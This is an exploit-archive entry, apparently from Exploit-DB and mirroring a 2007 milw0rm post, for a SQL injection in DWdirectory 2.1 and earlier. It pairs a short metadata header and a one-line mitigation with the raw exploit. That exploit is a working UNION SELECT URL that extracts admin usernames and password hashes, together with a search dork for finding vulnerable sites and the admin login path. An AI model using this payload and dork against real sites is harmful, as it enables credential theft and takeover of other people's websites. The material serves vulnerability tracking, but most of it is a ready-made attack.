header-logo
Suggest Exploit
vendor:
DWdirectory
by:
t0pP8uZz & xprog
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DWdirectory
Affected Version From: 2.1 AND PRIOR
Affected Version To: 2.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility

Pull admin info from the database

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK (altavista.com): "Powered by DWdirectory"


DESCRIPTION: 
pull admin info from the database

EXPLOITS:
www.site.com/search?search=null'+and+1=2+UNION+ALL+SELECT+concat(username,char(58),password),2,3,4+FROM+users/**/LIMIT/**/0,1/*&submit=Search


NOTE/TIP: 
admin login is at /admin/

GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		    DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-09]